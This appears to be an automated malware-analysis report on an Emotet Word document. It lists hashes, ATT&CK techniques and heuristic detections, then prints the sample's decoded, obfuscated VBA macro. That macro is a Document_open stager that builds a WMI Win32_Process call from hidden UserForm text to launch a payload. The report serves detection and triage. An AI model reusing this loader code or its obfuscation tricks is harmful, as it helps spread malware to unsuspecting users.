Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 0034836b32ab4d57…

MALICIOUS

Office (OLE)

187.2 KB Created: 2019-12-16 08:32:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: c9021e20f81822eb361ffde068e93a7e SHA-1: b3447d37998893ef871c5fe40371ea05ae872ff3 SHA-256: 0034836b32ab4d5707f3b3c5390fdfb85f86b5b7815ad54996a0ef5b9274269a
272 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample contains a VBA macro with a hidden UserForm and obfuscated code, a common technique for Emotet. Heuristics indicate a command stager is present, designed to execute code and likely download a secondary payload. The ClamAV signature also explicitly identifies it as Emotet.

Heuristics 9

  • ClamAV: Doc.Downloader.Emotet-7458423-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7458423-1
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
    Matched line in script
    Ggqigemz = Join(Split("qwh_h2bdwqwh_h2bdiqwh_h2bdnqwh_h2bdmqwh_h2bdgmqwh_h2bdtsqwh_h2bd:Wqwh_h2bdinqwh_h2bd3qwh_h2bd2_qwh_h2bd", "qwh_h2bd"), "") + Kyrevpin.Qjniafsohtzkw + "rocess"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Hcdtgxkcthnf = CreateObject(Cgsuqbgrdsd)
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set Gppbksbstrkuz = GetObject(INSN & Ggqigemz)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8109 bytes
SHA-256: e13371cb7926e0cce954e6257119a1bdb1c8a38254c6235468f7edc93492b3e3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
201 of 308 identifiers look randomly generated (e.g. 'qwh_h2bdwqwh_h2bdiqwh_h2bdnqwh_h2bdmqwh_') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Kyrevpin"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Qjniafsohtzkw, 0, 0, MSForms, TextBox"
Private Sub Document_open()
      Dim Gpjxzqvhp
      Dim Fbppzklof
      For Jbqaevsyqnuod = Jqhopfvk To 0
         Yfoouubdlcld = xPI
         Ustzgfigymaor = CDbl(3)
         Lnmbhmgzrmf = Tan(MyeW5A)
         Exsrtcwvaowij = 4 - Bngdbmzpz
         Joscmbxkcbuj = (3 - Dwlyptxuzyd)
         Glfispbs = Xcvkzpfh
         Oxqorkivop = CDbl(6)
         Fzryxtbttwwto = Tan(Ixftqzvnivqq)
      Next
      Dim Khrcephzhfyg
      Dim Mqfybxwryui
      For Xcvhxjkoe = Jqhopfvk To 0
         Tvcnqzcrc = xPI
         Afcvqxsjwu = CDbl(3)
         Jxlyaxychy = Tan(MyeW5A)
         Fuibysrlm = 4 - Pfcsnvvv
         Ltqebbte = (3 - Cgwpvork)
         Exvwvtxe = Mclctaswx
         Hvkzjimwydksk = CDbl(6)
         Xtiieotjpzv = Tan(Uwummewblxmkk)
      Next
      Dim Ecafkuwwyx
      Dim Awmjkyoabvneh
      For Linexvvf = Jqhopfvk To 0
         Zkhuucvq = xPI
         Lsyavjyi = CDbl(3)
         Wxsulnltede = Tan(MyeW5A)
         Fkohfhssnoqpt = 4 - Inxnvbhcrmi
         Cmpwtwsqhct = (3 - Xijbesdykqg)
         Uyiwuwabpbzuv = Xblelfeytqhq
         Rvjfxcuhkhwa = CDbl(6)
         Hjhjwlbjf = Tan(Qpzogmgxi)
      Next
Hcdtgxkcthnf
End Sub

Attribute VB_Name = "Jsbkraxy"
Attribute VB_Base = "0{830EAA7A-1B71-4277-B4AB-3EF880367575}{DD105773-569D-4B16-B191-C6B4AFEA6D1F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Lguhsipfaag"
Function Ajueafukppsix()
      Dim Dwqunlcvs
      Dim Fqclqftqect
      For Yyvkiorife = Jqhopfvk To 0
         Ttbepqzuql = xPI
         Tqosxcdkvf = CDbl(3)
         Qrmesgampzw = Tan(MyeW5A)
         Mplthtnylqsz = 4 - Cacqnxmnxd
         Jlnuuucb = (3 - Sqomiqfaueu)
         Lmiioeyrhyfjc = Wxwxaoimcbp
         Xjqhonbhll = CDbl(6)
         Nvlsicfeoewhw = Tan(Daggyipuyi)
      Next
Glvgiorl = Kyrevpin.Qjniafsohtzkw
      Dim Rbrxawdabkv
      Dim Iemdgitxw
      For Ovufakqa = Jqhopfvk To 0
         Uzpkrrlriaonn = xPI
         Oycgqqvgni = CDbl(3)
         Xzruumjn = Tan(MyeW5A)
         Toqignvobhfvm = 4 - Ubfzsbbmpor
         Ubebereop = (3 - Hlzhywbnfg)
         Dnmurcbupw = Zcdrvgzetvsh
         Nsmemztqansw = CDbl(6)
         Nnulwehwtk = Tan(Gvqivfrxpihkk)
      Next
Qcxkvwdlvty = Glvgiorl + Jsbkraxy.Kioicuxkupknt + Jsbkraxy.Ecclogdoh + Jsbkraxy.Gqemglefkb
      Dim Yvalekapl
      Dim Zaaslpipywaoo
      For Vkuxvthytqz = Jqhopfvk To 0
         Uuylprti = xPI
         Dvudmjxh = CDbl(3)
         Rpqvnkfsc = Tan(MyeW5A)
         Lkgvexoy = 4 - Fujqcbqvpv
         Ykeddyfmbft = (3 - Knhhljjpvmug)
         Joxnmtymvq = Qskkzbmyrnin
         Zxcykwynvx = CDbl(6)
         Hdsyrrgqsqfl = Tan(Uguvfjjzubjx)
      Next
Ovrexuwvzbhqc = Qcxkvwdlvty + Jsbkraxy.Zdvhlzvvtqot + Jsbkraxy.Dmgujvpeglnv
      Dim Rrqrbdqma
      Dim Vjuanewyu
      For Lmxwhzacwkh = Jqhopfvk To 0
         Koturumlcgitm = xPI
         Zsaqcefdt = CDbl(3)
         Rlyaxogwpzlch = Tan(MyeW5A)
         Bigpduvucekr = 4 - Flzpudancitm
         Hnqsqjcwxeb = (3 - Rvwnxfbkommn)
         Ogxvqehmpnra = Inunshjrgvwh
         Tbdfusoq = CDbl(6)
         Lxnfgivwoj = Tan(Ryuoiwac)
      Next
Ajueafukppsix = Muclacme + Ovrexuwvzbhqc + Muclacme
      Dim Kffoulmvin
      Dim Kpbtitdwkknt
      For Pmmiryxnpi = Jqhopfvk To 0
         Wqmtbddgft = xPI
         Knblcarml = CDbl(3)
         Aiawqvwztlvwn = Tan(MyeW5A)
         Jkpvhvlhxdx = 4 - Pqvbptmlah
         Ititpqoblq = (3 - Qabpbcssjlkcq)
         Txfjcckyb = Imjkayizkos
         Xoucxjgdvj = CDbl(6)
         Fhftfbzm = Tan(Gjykltrjsaav)
      Next
End Function
Function Hcdtgxkcthnf()
      Dim Wbhknmln
      Dim Slmggfpbmgz
      For Wsuwgnagssq = Jqhopfvk To 0
         Ucfsyhagobznl = xPI
         Oaqetkksspf = CDbl(3)
         Hatwtklnwt = Tan(MyeW5A)
         Ckirvjuxkrsc = 4 - Ljjmcsgpynhd
         Ebsghmqa = (3 - Xgkdapir)
         Ybdjqplnlujsp = Jzmuaclhjpwh
         Ifqttbcxips = CDbl(6)
         Ohqerqlq = Tan(Xjwntuuuhixdo)
      Next
Ggqigemz = Join(Split("qwh_h2bdwqwh_h2bdiqwh_h2bdnqwh_h2bdmqwh_h2bdgmqwh_h2bdtsqwh_h2bd:Wqwh_h2bdinqwh_h2bd3qwh_h2bd2_qwh_h2bd", "qwh_h2bd"), "") + Kyrevpin.Qjniafsohtzkw + "rocess"
      Dim Aefucgbnwqx
      Dim Xxydeehlhfg
      For Gsucpyhqhxvx = Jqhopfvk To 0
         Juynlxgvvm = xPI
         Vpeszzvjaist = CDbl(3)
         Nypacgbryrjru = Tan(MyeW5A)
         Kxiiudsmox = 4 - Umabemmj
         Ujntdqmji = (3 - Wplklgvvmacg)
         Fypfeired = Uazbzfpqgxwor
         Rovgsciny = CDbl(6)
         Edwdrljlqfvun = Tan(Qyiijylyrcj)
      Next
Set Gppbksbstrkuz = GetObject(INSN & Ggqigemz)
      Dim Pbsegjhkrgb
      Dim Cijmikvjs
      For Zbkptafu = Jqhopfvk To 0
         Mhsuwzyckruj = xPI
         Zrvnhhgwxqeey = CDbl(3)
         Rbhtlqaqrlk = Tan(MyeW5A)
         Imgpqnpbe = 4 - Unpkbpsbgmt
         Qzgybdcxkzo = (3 - Onldomkuzx)
         Pbtjqupwtzr = Abopjnayrae
         Xggtrbfi = CDbl(6)
         Jntfzpqp = Tan(Mnlvepja)
      Next
Fixnlgod = Ggqigemz + Jsbkraxy.Gpqvirrnj.ControlTipText + Jsbkraxy.Dymsoqgugp.ControlTipText
      Dim Kjvncqehrk
      Dim Iveuhckcmyn
      For Pcqxnmgvlddj = Jqhopfvk To 0
         Gukinytb = xPI
         Pcaqizlvr = CDbl(3)
         Nnkexhsxsak = Tan(MyeW5A)
         Dicpafanzmhlm = 4 - Mrisfqsgae
         Bekeesbmaxw = (3 - Rzobctlrfk)
         Sejlbblkoyjo = Skcmovng
         Efykeywtjlm = CDbl(6)
         Byvkkwspatza = Tan(Tvgfmqshwda)
      Next
Cgsuqbgrdsd = Fixnlgod + Kyrevpin.Qjniafsohtzkw
      Dim Msabphthqor
      Dim Atdaqpuvodjk
      For Ulvgipvpjxbpu = Jqhopfvk To 0
         Zzcnevnav = xPI
         Wvyoqqnkzvvh = CDbl(3)
         Ykkfzavfnoeh = Tan(MyeW5A)
         Bgkzvoszruhlc = 4 - Mersufkduvk
         Ijkisojslvmu = (3 - Tqyoymoakmocs)
         Qelqaqhj = Naxbifyugqmv
         Ldiyxuqwsp = CDbl(6)
         Adzjmgawlmq = Tan(Hqhmaqux)
      Next
Set Hcdtgxkcthnf = CreateObject(Cgsuqbgrdsd)
      Dim Plmhwuwn
      Dim Csqbqyvan
      For Mnazstuzzxskh = Jqhopfvk To 0
         Jsxmtwfr = xPI
         Dukmeotg = CDbl(3)
         Ymiebboc = Tan(MyeW5A)
         Hirppcdbvb = 4 - Avoykmuiyebg
         Ktkshdjqvvcux = (3 - Slewcmmpdr)
         Zldglnsrk = Ucmjzswp
         Xgtxjzlxdhaf = CDbl(6)
         Esorhfkabi = Tan(Qcmxgcnpbfjj)
      Next
Hcdtgxkcthnf.XSize = False
      Dim Nxfylkeoa
      Dim Ibwmvphvlft
      For Mrcikldpjzkdn = Jqhopfvk To 0
         Nlzkjofevr = xPI
         Xrnzufgltiveo = CDbl(3)
         Ybmiiivh = Tan(MyeW5A)
         Ihjhmgrmo = 4 - Vaqxgvsfpvwgn
         Jipocjnu = (3 - Wegberaxccbvl)
         Cckjmbwbkw = Adpifezjrlele
         Kdbowoczhd = CDbl(6)
         Wzcwevuztnuvq = Tan(Uqyzfqsmyiim)
      Next
Hcdtgxkcthnf.YSize = False
      Dim Pkmhalvhnlqkk
      Dim Wdyzdawyxzwom
      For Ffyaurpyw = Jqhopfvk To 0
         Iftwregin = xPI
         Qwwtlohewi = CDbl(3)
         Gkmkaigeb = Tan(MyeW5A)
         Srfbiriebrtpb = 4 - Garrmwpz
         Eufagmkzxd = (3 - Nynodromv)
         Ybgnjedcs = Exceufipdaz
         Sexsxkaqtng = CDbl(6)
         Yavubjnx = Tan(Lzxjdfhgybt)
      Next
Do While Gppbksbstrkuz.Create(Null & Ajueafukppsix, Mxxglcgaujc, Hcdtgxkcthnf, Qsqixafbihdx)
Loop
      Dim Xaynyyjdffvrt
      Dim Jlczmqaj
      For Guxnkgwugiuql = Jqhopfvk To 0
         Yjxgihhspgc = xPI
         Lhxrqosdmquzy = CDbl(3)
         Mgtzyjohddz = Tan(MyeW5A)
         Chgiaziyldzxl = 4 - Tchkkufjnc
         Xaunrwtbejm = (3 - Oobdtcmwbnbwp)
         Wytgslly = Iaslhkpikvg
         Tzuqvmtrc = CDbl(6)
         Egpffndpkok = Tan(Ltdlnemxtsag)
      Next
End Function